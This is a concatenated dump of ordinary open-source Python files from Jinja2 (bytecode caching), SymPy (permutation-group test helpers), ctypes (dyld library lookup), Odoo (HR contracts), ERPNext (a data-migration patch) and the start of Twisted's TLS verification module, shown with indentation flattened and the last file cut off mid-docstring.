jinja2.bccache
~~~~~~~~~~~~~~
This module implements the bytecode cache system Jinja is optionally
using. This is useful if you have very complex template situations and
the compiliation of all those templates slow down your application too
much.
Situations where this is useful are often forking web applications that
are initialized on the first request.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD.
"""
from os import path, listdir
import os
import sys
import stat
import errno
import marshal
import tempfile
import fnmatch
from hashlib import sha1
from jinja2.utils import open_if_exists
from jinja2._compat import BytesIO, pickle, PY2, text_type
# marshal works better on 3.x, one hack less required
if not PY2:
marshal_dump = marshal.dump
marshal_load = marshal.load
else:
def marshal_dump(code, f):
if isinstance(f, file):
marshal.dump(code, f)
else:
f.write(marshal.dumps(code))
def marshal_load(f):
if isinstance(f, file):
return marshal.load(f)
return marshal.loads(f.read())
bc_version = 3
# magic version used to only change with new jinja versions. With 2.6
# we change this to also take Python version changes into account. The
# reason for this is that Python tends to segfault if fed earlier bytecode
# versions because someone thought it would be a good idea to reuse opcodes
# or make Python incompatible with earlier versions.
bc_magic = 'j2'.encode('ascii') + \
pickle.dumps(bc_version, 2) + \
pickle.dumps((sys.version_info[0] << 24) | sys.version_info[1])
class Bucket(object):
"""Buckets are used to store the bytecode for one template. It's created
and initialized by the bytecode cache and passed to the loading functions.
The buckets get an internal checksum from the cache assigned and use this
to automatically reject outdated cache material. Individual bytecode
cache subclasses don't have to care about cache invalidation.
"""
def __init__(self, environment, key, checksum):
self.environment = environment
self.key = key
self.checksum = checksum
self.reset()
def reset(self):
"""Resets the bucket (unloads the bytecode)."""
self.code = None
def load_bytecode(self, f):
"""Loads bytecode from a file or file like object."""
# make sure the magic header is correct
magic = f.read(len(bc_magic))
if magic != bc_magic:
self.reset()
return
# the source code of the file changed, we need to reload
checksum = pickle.load(f)
if self.checksum != checksum:
self.reset()
return
# if marshal_load fails then we need to reload
try:
self.code = marshal_load(f)
except (EOFError, ValueError, TypeError):
self.reset()
return
def write_bytecode(self, f):
"""Dump the bytecode into the file or file like object passed."""
if self.code is None:
raise TypeError('can\'t write empty bucket')
f.write(bc_magic)
pickle.dump(self.checksum, f, 2)
marshal_dump(self.code, f)
def bytecode_from_string(self, string):
"""Load bytecode from a string."""
self.load_bytecode(BytesIO(string))
def bytecode_to_string(self):
"""Return the bytecode as string."""
out = BytesIO()
self.write_bytecode(out)
return out.getvalue()
class BytecodeCache(object):
"""To implement your own bytecode cache you have to subclass this class
and override :meth:`load_bytecode` and :meth:`dump_bytecode`. Both of
these methods are passed a :class:`~jinja2.bccache.Bucket`.
A very basic bytecode cache that saves the bytecode on the file system::
from os import path
class MyCache(BytecodeCache):
def __init__(self, directory):
self.directory = directory
def load_bytecode(self, bucket):
filename = path.join(self.directory, bucket.key)
if path.exists(filename):
with open(filename, 'rb') as f:
bucket.load_bytecode(f)
def dump_bytecode(self, bucket):
filename = path.join(self.directory, bucket.key)
with open(filename, 'wb') as f:
bucket.write_bytecode(f)
A more advanced version of a filesystem based bytecode cache is part of
Jinja2.
"""
def load_bytecode(self, bucket):
"""Subclasses have to override this method to load bytecode into a
bucket. If they are not able to find code in the cache for the
bucket, it must not do anything.
"""
raise NotImplementedError()
def dump_bytecode(self, bucket):
"""Subclasses have to override this method to write the bytecode
from a bucket back to the cache. If it unable to do so it must not
fail silently but raise an exception.
"""
raise NotImplementedError()
def clear(self):
"""Clears the cache. This method is not used by Jinja2 but should be
implemented to allow applications to clear the bytecode cache used
by a particular environment.
"""
def get_cache_key(self, name, filename=None):
"""Returns the unique hash key for this template name."""
hash = sha1(name.encode('utf-8'))
if filename is not None:
filename = '|' + filename
if isinstance(filename, text_type):
filename = filename.encode('utf-8')
hash.update(filename)
return hash.hexdigest()
def get_source_checksum(self, source):
"""Returns a checksum for the source."""
return sha1(source.encode('utf-8')).hexdigest()
def get_bucket(self, environment, name, filename, source):
"""Return a cache bucket for the given template. All arguments are
mandatory but filename may be `None`.
"""
key = self.get_cache_key(name, filename)
checksum = self.get_source_checksum(source)
bucket = Bucket(environment, key, checksum)
self.load_bytecode(bucket)
return bucket
def set_bucket(self, bucket):
"""Put the bucket into the cache."""
self.dump_bytecode(bucket)
class FileSystemBytecodeCache(BytecodeCache):
"""A bytecode cache that stores bytecode on the filesystem. It accepts
two arguments: The directory where the cache items are stored and a
pattern string that is used to build the filename.
If no directory is specified a default cache directory is selected. On
Windows the user's temp directory is used, on UNIX systems a directory
is created for the user in the system temp directory.
The pattern can be used to have multiple separate caches operate on the
same directory. The default pattern is ``'__jinja2_%s.cache'``. ``%s``
is replaced with the cache key.
>>> bcc = FileSystemBytecodeCache('/tmp/jinja_cache', '%s.cache')
This bytecode cache supports clearing of the cache using the clear method.
"""
def __init__(self, directory=None, pattern='__jinja2_%s.cache'):
if directory is None:
directory = self._get_default_cache_dir()
self.directory = directory
self.pattern = pattern
def _get_default_cache_dir(self):
def _unsafe_dir():
raise RuntimeError('Cannot determine safe temp directory. You '
'need to explicitly provide one.')
tmpdir = tempfile.gettempdir()
# On windows the temporary directory is used specific unless
# explicitly forced otherwise. We can just use that.
if os.name == 'nt':
return tmpdir
if not hasattr(os, 'getuid'):
_unsafe_dir()
dirname = '_jinja2-cache-%d' % os.getuid()
actual_dir = os.path.join(tmpdir, dirname)
try:
os.mkdir(actual_dir, stat.S_IRWXU)
except OSError as e:
if e.errno != errno.EEXIST:
raise
try:
os.chmod(actual_dir, stat.S_IRWXU)
actual_dir_stat = os.lstat(actual_dir)
if actual_dir_stat.st_uid != os.getuid() \
or not stat.S_ISDIR(actual_dir_stat.st_mode) \
or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU:
_unsafe_dir()
except OSError as e:
if e.errno != errno.EEXIST:
raise
actual_dir_stat = os.lstat(actual_dir)
if actual_dir_stat.st_uid != os.getuid() \
or not stat.S_ISDIR(actual_dir_stat.st_mode) \
or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU:
_unsafe_dir()
return actual_dir
def _get_cache_filename(self, bucket):
return path.join(self.directory, self.pattern % bucket.key)
def load_bytecode(self, bucket):
f = open_if_exists(self._get_cache_filename(bucket), 'rb')
if f is not None:
try:
bucket.load_bytecode(f)
finally:
f.close()
def dump_bytecode(self, bucket):
f = open(self._get_cache_filename(bucket), 'wb')
try:
bucket.write_bytecode(f)
finally:
f.close()
def clear(self):
# imported lazily here because google app-engine doesn't support
# write access on the file system and the function does not exist
# normally.
from os import remove
files = fnmatch.filter(listdir(self.directory), self.pattern % '*')
for filename in files:
try:
remove(path.join(self.directory, filename))
except OSError:
pass
class MemcachedBytecodeCache(BytecodeCache):
"""This class implements a bytecode cache that uses a memcache cache for
storing the information. It does not enforce a specific memcache library
(tummy's memcache or cmemcache) but will accept any class that provides
the minimal interface required.
Libraries compatible with this class:
- `werkzeug <http://werkzeug.pocoo.org/>`_.contrib.cache
- `python-memcached <https://www.tummy.com/Community/software/python-memcached/>`_
- `cmemcache <http://gijsbert.org/cmemcache/>`_
(Unfortunately the django cache interface is not compatible because it
does not support storing binary data, only unicode. You can however pass
the underlying cache client to the bytecode cache which is available
as `django.core.cache.cache._client`.)
The minimal interface for the client passed to the constructor is this:
.. class:: MinimalClientInterface
.. method:: set(key, value[, timeout])
Stores the bytecode in the cache. `value` is a string and
`timeout` the timeout of the key. If timeout is not provided
a default timeout or no timeout should be assumed, if it's
provided it's an integer with the number of seconds the cache
item should exist.
.. method:: get(key)
Returns the value for the cache key. If the item does not
exist in the cache the return value must be `None`.
The other arguments to the constructor are the prefix for all keys that
is added before the actual cache key and the timeout for the bytecode in
the cache system. We recommend a high (or no) timeout.
This bytecode cache does not support clearing of used items in the cache.
The clear method is a no-operation function.
.. versionadded:: 2.7
Added support for ignoring memcache errors through the
`ignore_memcache_errors` parameter.
"""
def __init__(self, client, prefix='jinja2/bytecode/', timeout=None,
ignore_memcache_errors=True):
self.client = client
self.prefix = prefix
self.timeout = timeout
self.ignore_memcache_errors = ignore_memcache_errors
def load_bytecode(self, bucket):
try:
code = self.client.get(self.prefix + bucket.key)
except Exception:
if not self.ignore_memcache_errors:
raise
code = None
if code is not None:
bucket.bytecode_from_string(code)
def dump_bytecode(self, bucket):
args = (self.prefix + bucket.key, bucket.bytecode_to_string())
if self.timeout is not None:
args += (self.timeout,)
try:
self.client.set(*args)
except Exception:
if not self.ignore_memcache_errors:
raise
| lgpl-2.1 |
jaimahajan1997/sympy | sympy/combinatorics/testutil.py | 33 | 11004 | from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy.combinatorics.util import _distribute_gens_by_base
from sympy.combinatorics import Permutation
rmul = Permutation.rmul
def _cmp_perm_lists(first, second):
"""
Compare two lists of permutations as sets.
This is used for testing purposes. Since the array form of a
permutation is currently a list, Permutation is not hashable
and cannot be put into a set.
Examples
========
>>> from sympy.combinatorics.permutations import Permutation
>>> from sympy.combinatorics.testutil import _cmp_perm_lists
>>> a = Permutation([0, 2, 3, 4, 1])
>>> b = Permutation([1, 2, 0, 4, 3])
>>> c = Permutation([3, 4, 0, 1, 2])
>>> ls1 = [a, b, c]
>>> ls2 = [b, c, a]
>>> _cmp_perm_lists(ls1, ls2)
True
"""
return {tuple(a) for a in first} == \
{tuple(a) for a in second}
def _naive_list_centralizer(self, other, af=False):
from sympy.combinatorics.perm_groups import PermutationGroup
"""
Return a list of elements for the centralizer of a subgroup/set/element.
This is a brute force implementation that goes over all elements of the
group and checks for membership in the centralizer. It is used to
test ``.centralizer()`` from ``sympy.combinatorics.perm_groups``.
Examples
========
>>> from sympy.combinatorics.testutil import _naive_list_centralizer
>>> from sympy.combinatorics.named_groups import DihedralGroup
>>> D = DihedralGroup(4)
>>> _naive_list_centralizer(D, D)
[Permutation([0, 1, 2, 3]), Permutation([2, 3, 0, 1])]
See Also
========
sympy.combinatorics.perm_groups.centralizer
"""
from sympy.combinatorics.permutations import _af_commutes_with
if hasattr(other, 'generators'):
elements = list(self.generate_dimino(af=True))
gens = [x._array_form for x in other.generators]
commutes_with_gens = lambda x: all(_af_commutes_with(x, gen) for gen in gens)
centralizer_list = []
if not af:
for element in elements:
if commutes_with_gens(element):
centralizer_list.append(Permutation._af_new(element))
else:
for element in elements:
if commutes_with_gens(element):
centralizer_list.append(element)
return centralizer_list
elif hasattr(other, 'getitem'):
return _naive_list_centralizer(self, PermutationGroup(other), af)
elif hasattr(other, 'array_form'):
return _naive_list_centralizer(self, PermutationGroup([other]), af)
def _verify_bsgs(group, base, gens):
"""
Verify the correctness of a base and strong generating set.
This is a naive implementation using the definition of a base and a strong
generating set relative to it. There are other procedures for
verifying a base and strong generating set, but this one will
serve for more robust testing.
Examples
========
>>> from sympy.combinatorics.named_groups import AlternatingGroup
>>> from sympy.combinatorics.testutil import _verify_bsgs
>>> A = AlternatingGroup(4)
>>> A.schreier_sims()
>>> _verify_bsgs(A, A.base, A.strong_gens)
True
See Also
========
sympy.combinatorics.perm_groups.PermutationGroup.schreier_sims
"""
from sympy.combinatorics.perm_groups import PermutationGroup
strong_gens_distr = _distribute_gens_by_base(base, gens)
current_stabilizer = group
for i in range(len(base)):
candidate = PermutationGroup(strong_gens_distr[i])
if current_stabilizer.order() != candidate.order():
return False
current_stabilizer = current_stabilizer.stabilizer(base[i])
if current_stabilizer.order() != 1:
return False
return True
def _verify_centralizer(group, arg, centr=None):
"""
Verify the centralizer of a group/set/element inside another group.
This is used for testing ``.centralizer()`` from
``sympy.combinatorics.perm_groups``
Examples
========
>>> from sympy.combinatorics.named_groups import (SymmetricGroup,
... AlternatingGroup)
>>> from sympy.combinatorics.perm_groups import PermutationGroup
>>> from sympy.combinatorics.permutations import Permutation
>>> from sympy.combinatorics.testutil import _verify_centralizer
>>> S = SymmetricGroup(5)
>>> A = AlternatingGroup(5)
>>> centr = PermutationGroup([Permutation([0, 1, 2, 3, 4])])
>>> _verify_centralizer(S, A, centr)
True
See Also
========
_naive_list_centralizer,
sympy.combinatorics.perm_groups.PermutationGroup.centralizer,
_cmp_perm_lists
"""
if centr is None:
centr = group.centralizer(arg)
centr_list = list(centr.generate_dimino(af=True))
centr_list_naive = _naive_list_centralizer(group, arg, af=True)
return _cmp_perm_lists(centr_list, centr_list_naive)
def _verify_normal_closure(group, arg, closure=None):
from sympy.combinatorics.perm_groups import PermutationGroup
"""
Verify the normal closure of a subgroup/subset/element in a group.
This is used to test
sympy.combinatorics.perm_groups.PermutationGroup.normal_closure
Examples
========
>>> from sympy.combinatorics.named_groups import (SymmetricGroup,
... AlternatingGroup)
>>> from sympy.combinatorics.testutil import _verify_normal_closure
>>> S = SymmetricGroup(3)
>>> A = AlternatingGroup(3)
>>> _verify_normal_closure(S, A, closure=A)
True
See Also
========
sympy.combinatorics.perm_groups.PermutationGroup.normal_closure
"""
if closure is None:
closure = group.normal_closure(arg)
conjugates = set()
if hasattr(arg, 'generators'):
subgr_gens = arg.generators
elif hasattr(arg, '__getitem__'):
subgr_gens = arg
elif hasattr(arg, 'array_form'):
subgr_gens = [arg]
for el in group.generate_dimino():
for gen in subgr_gens:
conjugates.add(gen ^ el)
naive_closure = PermutationGroup(list(conjugates))
return closure.is_subgroup(naive_closure)
def canonicalize_naive(g, dummies, sym, *v):
"""
Canonicalize tensor formed by tensors of the different types
g permutation representing the tensor
dummies list of dummy indices
msym symmetry of the metric
v is a list of (base_i, gens_i, n_i, sym_i) for tensors of type `i`
base_i, gens_i BSGS for tensors of this type
n_i number ot tensors of type `i`
sym_i symmetry under exchange of two component tensors of type `i`
None no symmetry
0 commuting
1 anticommuting
Return 0 if the tensor is zero, else return the array form of
the permutation representing the canonical form of the tensor.
Examples
========
>>> from sympy.combinatorics.testutil import canonicalize_naive
>>> from sympy.combinatorics.tensor_can import get_symmetric_group_sgs
>>> from sympy.combinatorics import Permutation, PermutationGroup
>>> g = Permutation([1, 3, 2, 0, 4, 5])
>>> base2, gens2 = get_symmetric_group_sgs(2)
>>> canonicalize_naive(g, [2, 3], 0, (base2, gens2, 2, 0))
[0, 2, 1, 3, 4, 5]
"""
from sympy.combinatorics.perm_groups import PermutationGroup
from sympy.combinatorics.tensor_can import gens_products, dummy_sgs
from sympy.combinatorics.permutations import Permutation, _af_rmul
v1 = []
for i in range(len(v)):
base_i, gens_i, n_i, sym_i = v[i]
v1.append((base_i, gens_i, [[]]*n_i, sym_i))
size, sbase, sgens = gens_products(*v1)
dgens = dummy_sgs(dummies, sym, size-2)
if isinstance(sym, int):
num_types = 1
dummies = [dummies]
sym = [sym]
else:
num_types = len(sym)
dgens = []
for i in range(num_types):
dgens.extend(dummy_sgs(dummies[i], sym[i], size - 2))
S = PermutationGroup(sgens)
D = PermutationGroup([Permutation(x) for x in dgens])
dlist = list(D.generate(af=True))
g = g.array_form
st = set()
for s in S.generate(af=True):
h = _af_rmul(g, s)
for d in dlist:
q = tuple(_af_rmul(d, h))
st.add(q)
a = list(st)
a.sort()
prev = (0,)*size
for h in a:
if h[:-2] == prev[:-2]:
if h[-1] != prev[-1]:
return 0
prev = h
return list(a[0])
def graph_certificate(gr):
"""
Return a certificate for the graph
gr adjacency list
The graph is assumed to be unoriented and without
external lines.
Associate to each vertex of the graph a symmetric tensor with
number of indices equal to the degree of the vertex; indices
are contracted when they correspond to the same line of the graph.
The canonical form of the tensor gives a certificate for the graph.
This is not an efficient algorithm to get the certificate of a graph.
Examples
========
>>> from sympy.combinatorics.testutil import graph_certificate
>>> gr1 = {0:[1, 2, 3, 5], 1:[0, 2, 4], 2:[0, 1, 3, 4], 3:[0, 2, 4], 4:[1, 2, 3, 5], 5:[0, 4]}
>>> gr2 = {0:[1, 5], 1:[0, 2, 3, 4], 2:[1, 3, 5], 3:[1, 2, 4, 5], 4:[1, 3, 5], 5:[0, 2, 3, 4]}
>>> c1 = graph_certificate(gr1)
>>> c2 = graph_certificate(gr2)
>>> c1
[0, 2, 4, 6, 1, 8, 10, 12, 3, 14, 16, 18, 5, 9, 15, 7, 11, 17, 13, 19, 20, 21]
>>> c1 == c2
True
"""
from sympy.combinatorics.permutations import _af_invert
from sympy.combinatorics.tensor_can import get_symmetric_group_sgs, canonicalize
items = list(gr.items())
items.sort(key=lambda x: len(x[1]), reverse=True)
pvert = [x[0] for x in items]
pvert = _af_invert(pvert)
# the indices of the tensor are twice the number of lines of the graph
num_indices = 0
for v, neigh in items:
num_indices += len(neigh)
# associate to each vertex its indices; for each line
# between two vertices assign the
# even index to the vertex which comes first in items,
# the odd index to the other vertex
vertices = [[] for i in items]
i = 0
for v, neigh in items:
for v2 in neigh:
if pvert[v] < pvert[v2]:
vertices[pvert[v]].append(i)
vertices[pvert[v2]].append(i+1)
i += 2
g = []
for v in vertices:
g.extend(v)
assert len(g) == num_indices
g += [num_indices, num_indices + 1]
size = num_indices + 2
assert sorted(g) == list(range(size))
g = Permutation(g)
vlen = [0]*(len(vertices[0])+1)
for neigh in vertices:
vlen[len(neigh)] += 1
v = []
for i in range(len(vlen)):
n = vlen[i]
if n:
base, gens = get_symmetric_group_sgs(i)
v.append((base, gens, n, 0))
v.reverse()
dummies = list(range(num_indices))
can = canonicalize(g, dummies, 0, *v)
return can
| bsd-3-clause |
hynnet/openwrt-mt7620 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/usr/lib/python2.7/ctypes/macholib/dyld.py | 253 | 5341 | ######################################################################
# This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
"""
dyld emulation
"""
import os
from framework import framework_info
from dylib import dylib_info
from itertools import *
__all__ = [
'dyld_find', 'framework_find',
'framework_info', 'dylib_info',
]
# These are the defaults as per man dyld(1)
#
DEFAULT_FRAMEWORK_FALLBACK = [
os.path.expanduser("~/Library/Frameworks"),
"/Library/Frameworks",
"/Network/Library/Frameworks",
"/System/Library/Frameworks",
]
DEFAULT_LIBRARY_FALLBACK = [
os.path.expanduser("~/lib"),
"/usr/local/lib",
"/lib",
"/usr/lib",
]
def ensure_utf8(s):
"""Not all of PyObjC and Python understand unicode paths very well yet"""
if isinstance(s, unicode):
return s.encode('utf8')
return s
def dyld_env(env, var):
if env is None:
env = os.environ
rval = env.get(var)
if rval is None:
return []
return rval.split(':')
def dyld_image_suffix(env=None):
if env is None:
env = os.environ
return env.get('DYLD_IMAGE_SUFFIX')
def dyld_framework_path(env=None):
return dyld_env(env, 'DYLD_FRAMEWORK_PATH')
def dyld_library_path(env=None):
return dyld_env(env, 'DYLD_LIBRARY_PATH')
def dyld_fallback_framework_path(env=None):
return dyld_env(env, 'DYLD_FALLBACK_FRAMEWORK_PATH')
def dyld_fallback_library_path(env=None):
return dyld_env(env, 'DYLD_FALLBACK_LIBRARY_PATH')
def dyld_image_suffix_search(iterator, env=None):
"""For a potential path iterator, add DYLD_IMAGE_SUFFIX semantics"""
suffix = dyld_image_suffix(env)
if suffix is None:
return iterator
def _inject(iterator=iterator, suffix=suffix):
for path in iterator:
if path.endswith('.dylib'):
yield path[:-len('.dylib')] + suffix + '.dylib'
else:
yield path + suffix
yield path
return _inject()
def dyld_override_search(name, env=None):
# If DYLD_FRAMEWORK_PATH is set and this dylib_name is a
# framework name, use the first file that exists in the framework
# path if any. If there is none go on to search the DYLD_LIBRARY_PATH
# if any.
framework = framework_info(name)
if framework is not None:
for path in dyld_framework_path(env):
yield os.path.join(path, framework['name'])
# If DYLD_LIBRARY_PATH is set then use the first file that exists
# in the path. If none use the original name.
for path in dyld_library_path(env):
yield os.path.join(path, os.path.basename(name))
def dyld_executable_path_search(name, executable_path=None):
# If we haven't done any searching and found a library and the
# dylib_name starts with "@executable_path/" then construct the
# library name.
if name.startswith('@executable_path/') and executable_path is not None:
yield os.path.join(executable_path, name[len('@executable_path/'):])
def dyld_default_search(name, env=None):
yield name
framework = framework_info(name)
if framework is not None:
fallback_framework_path = dyld_fallback_framework_path(env)
for path in fallback_framework_path:
yield os.path.join(path, framework['name'])
fallback_library_path = dyld_fallback_library_path(env)
for path in fallback_library_path:
yield os.path.join(path, os.path.basename(name))
if framework is not None and not fallback_framework_path:
for path in DEFAULT_FRAMEWORK_FALLBACK:
yield os.path.join(path, framework['name'])
if not fallback_library_path:
for path in DEFAULT_LIBRARY_FALLBACK:
yield os.path.join(path, os.path.basename(name))
def dyld_find(name, executable_path=None, env=None):
"""
Find a library or framework using dyld semantics
"""
name = ensure_utf8(name)
executable_path = ensure_utf8(executable_path)
for path in dyld_image_suffix_search(chain(
dyld_override_search(name, env),
dyld_executable_path_search(name, executable_path),
dyld_default_search(name, env),
), env):
if os.path.isfile(path):
return path
raise ValueError("dylib %s could not be found" % (name,))
def framework_find(fn, executable_path=None, env=None):
"""
Find a framework using dyld semantics in a very loose manner.
Will take input such as:
Python
Python.framework
Python.framework/Versions/Current
"""
try:
return dyld_find(fn, executable_path=executable_path, env=env)
except ValueError, e:
pass
fmwk_index = fn.rfind('.framework')
if fmwk_index == -1:
fmwk_index = len(fn)
fn += '.framework'
fn = os.path.join(fn, os.path.basename(fn[:fmwk_index]))
try:
return dyld_find(fn, executable_path=executable_path, env=env)
except ValueError:
raise e
def test_dyld_find():
env = {}
assert dyld_find('libSystem.dylib') == '/usr/lib/libSystem.dylib'
assert dyld_find('System.framework/System') == '/System/Library/Frameworks/System.framework/System'
if __name__ == '__main__':
test_dyld_find()
| gpl-2.0 |
web30s/odoo-9.0c-20160402 | hello/templates/openerp/addons/hr_contract/hr_contract.py | 44 | 5741 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import time
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
class hr_employee(osv.osv):
_name = "hr.employee"
_description = "Employee"
_inherit = "hr.employee"
def _get_latest_contract(self, cr, uid, ids, field_name, args, context=None):
res = {}
obj_contract = self.pool.get('hr.contract')
for emp in self.browse(cr, uid, ids, context=context):
contract_ids = obj_contract.search(cr, uid, [('employee_id', '=', emp.id)], order='date_start', context=context)
if contract_ids:
res[emp.id] = contract_ids[-1:][0]
else:
res[emp.id] = False
return res
def _contracts_count(self, cr, uid, ids, field_name, arg, context=None):
Contract = self.pool['hr.contract']
return {
employee_id: Contract.search_count(cr, SUPERUSER_ID, [('employee_id', '=', employee_id)], context=context)
for employee_id in ids
}
_columns = {
'manager': fields.boolean('Is a Manager'),
'medic_exam': fields.date('Medical Examination Date'),
'place_of_birth': fields.char('Place of Birth'),
'children': fields.integer('Number of Children'),
'vehicle': fields.char('Company Vehicle'),
'vehicle_distance': fields.integer('Home-Work Dist.', help="In kilometers"),
'contract_ids': fields.one2many('hr.contract', 'employee_id', 'Contracts'),
'contract_id': fields.function(_get_latest_contract, string='Current Contract', type='many2one', relation="hr.contract", help='Latest contract of the employee'),
'contracts_count': fields.function(_contracts_count, type='integer', string='Contracts'),
}
class hr_contract_type(osv.osv):
_name = 'hr.contract.type'
_description = 'Contract Type'
_order = 'sequence, id'
_columns = {
'name': fields.char('Contract Type', required=True),
'sequence': fields.integer('Sequence', help="Gives the sequence when displaying a list of Contract."),
}
defaults = {
'sequence': 10
}
class hr_contract(osv.osv):
_name = 'hr.contract'
_description = 'Contract'
_inherit = ['mail.thread', 'ir.needaction_mixin']
_columns = {
'name': fields.char('Contract Reference', required=True),
'employee_id': fields.many2one('hr.employee', "Employee", required=True),
'department_id': fields.many2one('hr.department', string="Department"),
'type_id': fields.many2one('hr.contract.type', "Contract Type", required=True),
'job_id': fields.many2one('hr.job', 'Job Title'),
'date_start': fields.date('Start Date', required=True),
'date_end': fields.date('End Date'),
'trial_date_start': fields.date('Trial Start Date'),
'trial_date_end': fields.date('Trial End Date'),
'working_hours': fields.many2one('resource.calendar', 'Working Schedule'),
'wage': fields.float('Wage', digits=(16, 2), required=True, help="Basic Salary of the employee"),
'advantages': fields.text('Advantages'),
'notes': fields.text('Notes'),
'permit_no': fields.char('Work Permit No', required=False, readonly=False),
'visa_no': fields.char('Visa No', required=False, readonly=False),
'visa_expire': fields.date('Visa Expire Date'),
'state': fields.selection(
[('draft', 'New'), ('open', 'Running'), ('pending', 'To Renew'), ('close', 'Expired')],
string='Status', track_visibility='onchange',
help='Status of the contract'),
}
def _get_type(self, cr, uid, context=None):
type_ids = self.pool.get('hr.contract.type').search(cr, uid, [], limit=1)
return type_ids and type_ids[0] or False
_defaults = {
'date_start': lambda *a: time.strftime("%Y-%m-%d"),
'type_id': _get_type,
'state': 'draft',
}
def onchange_employee_id(self, cr, uid, ids, employee_id, context=None):
if not employee_id:
return {'value': {'job_id': False, 'department_id': False}}
emp_obj = self.pool.get('hr.employee').browse(cr, uid, employee_id, context=context)
job_id = dept_id = False
if emp_obj.job_id:
job_id = emp_obj.job_id.id
if emp_obj.department_id:
dept_id = emp_obj.department_id.id
return {'value': {'job_id': job_id, 'department_id': dept_id}}
def _check_dates(self, cr, uid, ids, context=None):
for contract in self.read(cr, uid, ids, ['date_start', 'date_end'], context=context):
if contract['date_start'] and contract['date_end'] and contract['date_start'] > contract['date_end']:
return False
return True
_constraints = [
(_check_dates, 'Error! Contract start-date must be less than contract end-date.', ['date_start', 'date_end'])
]
def set_as_pending(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'pending'}, context=context)
def set_as_close(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'close'}, context=context)
def _track_subtype(self, cr, uid, ids, init_values, context=None):
record = self.browse(cr, uid, ids[0], context=context)
if 'state' in init_values and record.state == 'pending':
return 'hr_contract.mt_contract_pending'
elif 'state' in init_values and record.state == 'close':
return 'hr_contract.mt_contract_close'
return super(hr_contract, self)._track_subtype(cr, uid, ids, init_values, context=context)
| gpl-3.0 |
mhbu50/erpnext | erpnext/patches/v12_0/rename_lost_reason_detail.py | 3 | 1325 | from __future__ import unicode_literals
import frappe
def execute():
if frappe.db.exists("DocType", "Lost Reason Detail"):
frappe.reload_doc("crm", "doctype", "opportunity_lost_reason")
frappe.reload_doc("crm", "doctype", "opportunity_lost_reason_detail")
frappe.reload_doc("setup", "doctype", "quotation_lost_reason_detail")
frappe.db.sql("""INSERT INTO `tabOpportunity Lost Reason Detail` SELECT * FROM `tabLost Reason Detail` WHERE `parenttype` = 'Opportunity'""")
frappe.db.sql("""INSERT INTO `tabQuotation Lost Reason Detail` SELECT * FROM `tabLost Reason Detail` WHERE `parenttype` = 'Quotation'""")
frappe.db.sql("""INSERT INTO `tabQuotation Lost Reason` (`name`, `creation`, `modified`, `modified_by`, `owner`, `docstatus`, `parent`, `parentfield`, `parenttype`, `idx`, `_comments`, `_assign`, `_user_tags`, `_liked_by`, `order_lost_reason`)
SELECT o.`name`, o.`creation`, o.`modified`, o.`modified_by`, o.`owner`, o.`docstatus`, o.`parent`, o.`parentfield`, o.`parenttype`, o.`idx`, o.`_comments`, o.`_assign`, o.`_user_tags`, o.`_liked_by`, o.`lost_reason`
FROM `tabOpportunity Lost Reason` o LEFT JOIN `tabQuotation Lost Reason` q ON q.name = o.name WHERE q.name IS NULL""")
frappe.delete_doc("DocType", "Lost Reason Detail") | gpl-3.0 |
msmolens/VTK | ThirdParty/Twisted/twisted/internet/_sslverify.py | 23 | 58378 | # -*- test-case-name: twisted.test.test_sslverify -*-
# Copyright (c) 2005 Divmod, Inc.
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from __future__ import division, absolute_import
import itertools
import warnings
from hashlib import md5
from OpenSSL import SSL, crypto, version
try:
from OpenSSL.SSL import SSL_CB_HANDSHAKE_DONE, SSL_CB_HANDSHAKE_START
except ImportError:
SSL_CB_HANDSHAKE_START = 0x10
SSL_CB_HANDSHAKE_DONE = 0x20
from twisted.python import log
def _cantSetHostnameIndication(connection, hostname):
"""
The option to set SNI is not available, so do nothing.
@param connection: the connection
@type connection: L{OpenSSL.SSL.Connection}
@param hostname: the server's host name
@type: hostname: L{bytes}
"""
def _setHostNameIndication(connection, hostname):
"""
Set the server name indication on the given client connection to the given
value.
@param connection: the connection
@type connection: L{OpenSSL.SSL.Connection}
@param hostname: the server's host name
@type: hostname: L{bytes}
"""
connection.set_tlsext_host_name(hostname)
if getattr(SSL.Connection, "set_tlsext_host_name", None) is None:
_maybeSetHostNameIndication = _cantSetHostnameIndication
else:
_maybeSetHostNameIndication = _setHostNameIndication
class SimpleVerificationError(Exception):
"""
Not a very useful verification error.
"""
def _idnaBytes(text):
"""
Convert some text typed by a human into some ASCII bytes.
This is provided to allow us to use the U{partially-broken IDNA
implementation in the standard library <http://bugs.python.org/issue17305>}
if the more-correct U{idna <https://pypi.python.org/pypi/idna>} package is
not available; C{service_identity} is somewhat stricter about this.
@param text: A domain name, hopefully.
@type text: L{unicode}
@return: The domain name's IDNA representation, encoded as bytes.
@rtype: L{bytes}
"""
try:
import idna
except ImportError:
return text.encode("idna")
else:
return idna.encode(text).encode("ascii")
def _idnaText(octets):
"""
Convert some IDNA-encoded octets into some human-readable text.
Currently only used by the tests.
@param octets: Some bytes representing a hostname.
@type octets: L{bytes}
@return: A human-readable domain name.
@rtype: L{unicode}
"""
try:
import idna
except ImportError:
return octets.decode("idna")
else:
return idna.decode(octets)
def simpleVerifyHostname(connection, hostname):
"""
Check only the common name in the certificate presented by the peer and
only for an exact match.
This is to provide I{something} in the way of hostname verification to
users who haven't upgraded past OpenSSL 0.12 or installed
C{service_identity}. This check is overly strict, relies on a deprecated
TLS feature (you're supposed to ignore the commonName if the
subjectAlternativeName extensions are present, I believe), and lots of
valid certificates will fail.
@param connection: the OpenSSL connection to verify.@
@type connection: L{OpenSSL.SSL.Connection}
@param hostname: The hostname expected by the user.
@type hostname: L{unicode}
@raise twisted.internet.ssl.VerificationError: if the common name and
hostname don't match.
"""
commonName = connection.get_peer_certificate().get_subject().commonName
if commonName != hostname:
raise SimpleVerificationError(repr(commonName) + "!=" +
repr(hostname))
def _selectVerifyImplementation():
"""
